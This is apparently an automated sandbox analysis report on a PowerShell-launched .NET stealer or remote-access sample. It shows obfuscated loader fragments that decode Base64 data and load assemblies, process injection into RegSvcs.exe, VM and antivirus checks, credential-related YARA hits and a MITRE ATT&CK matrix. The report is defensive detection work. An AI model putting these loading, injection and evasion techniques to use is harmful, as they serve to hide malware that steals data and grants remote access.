            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{V2nmRLmSKF1CEazyoHYuo6m9emt17bq2u60rUAxnzDvQJcK4a9rBHo9H9fLDI1cmnLG6[2],gu9bOeQlhx._7pHqSkwgqs(Convert.FromBase64String(V2nmRLmSKF1CEazyoHYuo6m9emt17bq2u60rUAxnzDvQJcK4a9rBHo9H9fLDI1cmnLG6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs .Net Code: iNEtFEzQwzL1gsauKFWGeQGfzsQSgjGcawEyzWnIgFvpytZaegyhRcGuB2j6S1vrFxUZ System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs .Net Code: E5kKs9cj0uXdi6oiS8xSyZdpfTNQINOeGCuU3yun5uJ2InPZKjHJiG4ePpzOX6Eu2WJy System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs .Net Code: E5kKs9cj0uXdi6oiS8xSyZdpfTNQINOeGCuU3yun5uJ2InPZKjHJiG4ePpzOX6Eu2WJy
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs .Net Code: iNEtFEzQwzL1gsauKFWGeQGfzsQSgjGcawEyzWnIgFvpytZaegyhRcGuB2j6S1vrFxUZ System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs .Net Code: E5kKs9cj0uXdi6oiS8xSyZdpfTNQINOeGCuU3yun5uJ2InPZKjHJiG4ePpzOX6Eu2WJy System.AppDomain.Load(byte[])
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs .Net Code: E5kKs9cj0uXdi6oiS8xSyZdpfTNQINOeGCuU3yun5uJ2InPZKjHJiG4ePpzOX6Eu2WJy
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFAACA36FCF push edi; iretd 0_2_00007FFAACA36FD6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFAACA3580F push ds; retf 0_2_00007FFAACA35811
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_00007FFAACA35000 push E8FFFFFFh; iretd 0_2_00007FFAACA3500D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_03048080 push eax; iretd 10_2_03048081
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 10_2_03044CC8 pushad ; retf 10_2_03044CD1
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, CUJj8rhTUC.cs High entropy of concatenated method names: 'B6q5G2SIT3', 'c0yaeoBjrR', 'hqd77vuGNU', 'KAYiml3MsKtSc', 'aiv8ZoOT4YBI8', '_46tL3teOEXUNN', 'WwEgkF8WBRcy4', 'uf2h91FEycj3T', 'Vw1iDoDKujbPw', 'mclGE0Q7t0qYP'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, aZ4hnq2aA0KBpgqPEF.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'mfNAitIckj4NZM6UvH1WtT0cue9liZa005dgrRM0kgmaaIxrJHD9ILQlGpqIFR1C5GmuLllOEDkazdBhh6VYu', 'NHutEdEkvOOERLuOEb6yRWTK2awrs6KebesmsBpgwYWUmGAwSJiGrRBBJZ1prqskP7hlrR0N6c6pwmywJnTCw', 'LOGfXtOFZW4Pm8XImq83GhOS2o3Yi74U3cP8h34tx1H4IU3tMYVzoTFutNiMsGUxMMYHYiGcTomBNmNaiwLVU', 'JguyEvhJ96xgcTi0zKq907HnYwvahHf1v3VIOnGGmI2lpBIr34ZT8aXP3B5jqIUldb8XD3xFHm4GqInQdxIYI'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, VN8UZyy4b6ESNDqqUGSm1D0bAFxMFecwJPTD.cs High entropy of concatenated method names: 'RPuGXQ6eEPp6geOU0Iy1GedXs9zIFQfbQiqK', 'dSVoLC7GYwuGmoyaVZclYPKORUHHj2TjLpRx', 'xq7xlHw70jBHUJMXu0b63cowWU4Ak5ikAIf0', 'hgBtEJpsPGe2j4wka5wZmq3TR39i', 'YlnKy17j3mFutVXogXJv6TM1FOQM', 'WwxBrAJWPj9pbxi8xfwtPAvobkD7', 'lx2tjivEac0BPCldO9jc0aiU4eIJ', 'sNi3XLBswlyQCqHHMo347fz3LPBL', 'rU79mJTlAyFvUhEToiFuryRnbHsd', 'ce21UxqN1xMrMSQscrnLQ6jlYx0R'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs High entropy of concatenated method names: '_88MEWWYcTrle5x9y1E3bbVOGiOhVYNIQ3HPrg8qL3Tt4jab8uIETF2yzNFMYqCpkq6oV', 'iNEtFEzQwzL1gsauKFWGeQGfzsQSgjGcawEyzWnIgFvpytZaegyhRcGuB2j6S1vrFxUZ', '_7uR9cusSyJEG8gI4fkoCkUrTHpTSpS29ZRX42sqWEWeL62HurIIVSdQNIVjwZGNcF6zI', 'z7Uu9Nwst38xH4Lb6iK6wscd1IvVTSDvqdBub3tkAd6kqZpG3NQc4nIupLyQVORTimKf', 'zDnCSJCxRduAbj3BVWXYmD8zW78orZqfPTNFH64ftnI0RiuCR1oK8y9iBJoMuoWa396W', 'sHWogUHlM5T3zyke8kOpBp0Kpsm1IUJJIYzPMZv4wS97epweNmefkbPA1zjJyTjMX8yu', 'XKXISg8cLhCpPEY3YssrbnrtvEkGkN4oRZj1N9uN1MsyKPtEFnDrKU6jebrlYra1NaWF', 'UBfcoXf9N6NSfgoXEIuWevbZ39xKvGThVPs0RNcxd7D70LRyWbSqTmnIBYXD87MRtShW', 'cqoNrWhmsgxXe090rjLWJqKQOHivj8cZcEYpREDUfj4fZmYtRsaEIAQNBbBTMmPiQED5', 'XITq9yUmYpS97z27lpSPUFacRf8UKfHW6RSBbSryUWljkM2WABqCYcMZjjl8Cz2trKES'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.cs High entropy of concatenated method names: 'K80s31ehnbTVEI4xL20Ml4v6hiDsMt2RT8Ke', 'Ic27ZYv8gPxLBu153FcudUwF9Ypa4lBkRvU3', 'oLDaVx8R7yqkdek4HxnPoMvlPLumWh42MsG4', 'UIoyb1EAVJ7DqYwwG4mEn86W2bIYrRKFtpjH', 'l3yJSMntP0aYhoUEQOIQiJ5MZMqnBBP8cH1h', 'YeIu5xqL9eFZ9yeDRUxZAVc5ol0vdbOF7MjQ', 'l0Vm0T55LV9uwyEUPA4YVhJ5zdJjC1FkyClX', 'a27dj8pdk7A2gTh6c8azwKq3GdPf4RBzEUU3', 'pabemwh3cC8ok4MqUKtUTAHOqH1eSpGMtCAu', 'rkgxmEW6ZGSC7RrGtgZhXDJjWerMKkrczxje'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, YyDTZrRoQx.cs High entropy of concatenated method names: 'pH7JWkO8j8', 'y2ctnHNEemJ0b4dJSzr9951KJmUs', 'IH23sQMbMknL1tPv5C0CR180vRdv', '_7gd1KKxxKTOLCOQGeJjpw9WH2uIu', 'zB3h7kGtmNeaSPX4wxVktKFdmblc'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, g3vLTCbXUu.cs High entropy of concatenated method names: 'Q8mwWLJjkp', 'DNXOHjXwwRN1Y0RZf8HGbp9XxdXj', 'yhm3mFjiu8qKagIG8tkVrfuICeQX', 'OZiOuYY75mwyk48M17of3NsL9IIt', 'Arr2zYwfIT23ekIUKysmLNPfG32B'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, gu9bOeQlhx.cs High entropy of concatenated method names: 'IJ8IZmUQCc', '_9wFk9JCSot', 'GpXlnbAt9M', 'nT2yG43RnY', '_3rRzw2eaDt', 'KVNBLm4Pev', 'oxCLZhLXIe', 'FzoO6KSdPT', 'QrVMKdnxIk', 'qRtUVYT2W1'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, CUJj8rhTUC.cs High entropy of concatenated method names: 'B6q5G2SIT3', 'c0yaeoBjrR', 'hqd77vuGNU', 'KAYiml3MsKtSc', 'aiv8ZoOT4YBI8', '_46tL3teOEXUNN', 'WwEgkF8WBRcy4', 'uf2h91FEycj3T', 'Vw1iDoDKujbPw', 'mclGE0Q7t0qYP'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, aZ4hnq2aA0KBpgqPEF.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'mfNAitIckj4NZM6UvH1WtT0cue9liZa005dgrRM0kgmaaIxrJHD9ILQlGpqIFR1C5GmuLllOEDkazdBhh6VYu', 'NHutEdEkvOOERLuOEb6yRWTK2awrs6KebesmsBpgwYWUmGAwSJiGrRBBJZ1prqskP7hlrR0N6c6pwmywJnTCw', 'LOGfXtOFZW4Pm8XImq83GhOS2o3Yi74U3cP8h34tx1H4IU3tMYVzoTFutNiMsGUxMMYHYiGcTomBNmNaiwLVU', 'JguyEvhJ96xgcTi0zKq907HnYwvahHf1v3VIOnGGmI2lpBIr34ZT8aXP3B5jqIUldb8XD3xFHm4GqInQdxIYI'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, VN8UZyy4b6ESNDqqUGSm1D0bAFxMFecwJPTD.cs High entropy of concatenated method names: 'RPuGXQ6eEPp6geOU0Iy1GedXs9zIFQfbQiqK', 'dSVoLC7GYwuGmoyaVZclYPKORUHHj2TjLpRx', 'xq7xlHw70jBHUJMXu0b63cowWU4Ak5ikAIf0', 'hgBtEJpsPGe2j4wka5wZmq3TR39i', 'YlnKy17j3mFutVXogXJv6TM1FOQM', 'WwxBrAJWPj9pbxi8xfwtPAvobkD7', 'lx2tjivEac0BPCldO9jc0aiU4eIJ', 'sNi3XLBswlyQCqHHMo347fz3LPBL', 'rU79mJTlAyFvUhEToiFuryRnbHsd', 'ce21UxqN1xMrMSQscrnLQ6jlYx0R'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs High entropy of concatenated method names: '_88MEWWYcTrle5x9y1E3bbVOGiOhVYNIQ3HPrg8qL3Tt4jab8uIETF2yzNFMYqCpkq6oV', 'iNEtFEzQwzL1gsauKFWGeQGfzsQSgjGcawEyzWnIgFvpytZaegyhRcGuB2j6S1vrFxUZ', '_7uR9cusSyJEG8gI4fkoCkUrTHpTSpS29ZRX42sqWEWeL62HurIIVSdQNIVjwZGNcF6zI', 'z7Uu9Nwst38xH4Lb6iK6wscd1IvVTSDvqdBub3tkAd6kqZpG3NQc4nIupLyQVORTimKf', 'zDnCSJCxRduAbj3BVWXYmD8zW78orZqfPTNFH64ftnI0RiuCR1oK8y9iBJoMuoWa396W', 'sHWogUHlM5T3zyke8kOpBp0Kpsm1IUJJIYzPMZv4wS97epweNmefkbPA1zjJyTjMX8yu', 'XKXISg8cLhCpPEY3YssrbnrtvEkGkN4oRZj1N9uN1MsyKPtEFnDrKU6jebrlYra1NaWF', 'UBfcoXf9N6NSfgoXEIuWevbZ39xKvGThVPs0RNcxd7D70LRyWbSqTmnIBYXD87MRtShW', 'cqoNrWhmsgxXe090rjLWJqKQOHivj8cZcEYpREDUfj4fZmYtRsaEIAQNBbBTMmPiQED5', 'XITq9yUmYpS97z27lpSPUFacRf8UKfHW6RSBbSryUWljkM2WABqCYcMZjjl8Cz2trKES'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.cs High entropy of concatenated method names: 'K80s31ehnbTVEI4xL20Ml4v6hiDsMt2RT8Ke', 'Ic27ZYv8gPxLBu153FcudUwF9Ypa4lBkRvU3', 'oLDaVx8R7yqkdek4HxnPoMvlPLumWh42MsG4', 'UIoyb1EAVJ7DqYwwG4mEn86W2bIYrRKFtpjH', 'l3yJSMntP0aYhoUEQOIQiJ5MZMqnBBP8cH1h', 'YeIu5xqL9eFZ9yeDRUxZAVc5ol0vdbOF7MjQ', 'l0Vm0T55LV9uwyEUPA4YVhJ5zdJjC1FkyClX', 'a27dj8pdk7A2gTh6c8azwKq3GdPf4RBzEUU3', 'pabemwh3cC8ok4MqUKtUTAHOqH1eSpGMtCAu', 'rkgxmEW6ZGSC7RrGtgZhXDJjWerMKkrczxje'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, YyDTZrRoQx.cs High entropy of concatenated method names: 'pH7JWkO8j8', 'y2ctnHNEemJ0b4dJSzr9951KJmUs', 'IH23sQMbMknL1tPv5C0CR180vRdv', '_7gd1KKxxKTOLCOQGeJjpw9WH2uIu', 'zB3h7kGtmNeaSPX4wxVktKFdmblc'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, g3vLTCbXUu.cs High entropy of concatenated method names: 'Q8mwWLJjkp', 'DNXOHjXwwRN1Y0RZf8HGbp9XxdXj', 'yhm3mFjiu8qKagIG8tkVrfuICeQX', 'OZiOuYY75mwyk48M17of3NsL9IIt', 'Arr2zYwfIT23ekIUKysmLNPfG32B'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, gu9bOeQlhx.cs High entropy of concatenated method names: 'IJ8IZmUQCc', '_9wFk9JCSot', 'GpXlnbAt9M', 'nT2yG43RnY', '_3rRzw2eaDt', 'KVNBLm4Pev', 'oxCLZhLXIe', 'FzoO6KSdPT', 'QrVMKdnxIk', 'qRtUVYT2W1'

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4926
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 1928
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 7885
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240 Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
            Source: Amcache.hve.18.dr Binary or memory string: VMware
            Source: Amcache.hve.18.dr Binary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.18.dr Binary or memory string: vmci.syshbin
            Source: Amcache.hve.18.dr Binary or memory string: VMware, Inc.
            Source: Amcache.hve.18.dr Binary or memory string: VMware20,1hbin@
            Source: Amcache.hve.18.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.18.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.18.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.18.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.18.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.18.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.18.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.18.dr Binary or memory string: vmci.sys
            Source: Amcache.hve.18.dr Binary or memory string: vmci.syshbin`
            Source: Amcache.hve.18.dr Binary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.18.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.18.dr Binary or memory string: VMware20,1
            Source: Amcache.hve.18.dr Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.18.dr Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.18.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.18.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.18.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.18.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.18.dr Binary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.18.dr Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.18.dr Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.18.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.18.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
            Source: RegSvcs.exe, 0000000A.00000002.3659546124.00000000014D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln=
            Source: Amcache.hve.18.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11F7008
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: Amcache.hve.18.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.18.dr Binary or memory string: msmpeng.exe
            Source: Amcache.hve.18.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.18.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.18.dr Binary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            Source: Yara match File source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7336, type: MEMORYSTR
            MITRE ATT&CK matrix (one row per technique slot, one column per tactic; a technique prefixed with a number is one the report flags for this sample, the number being the report's count for it):

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 131 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 211 Process Injection | Security Account Manager | 131 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
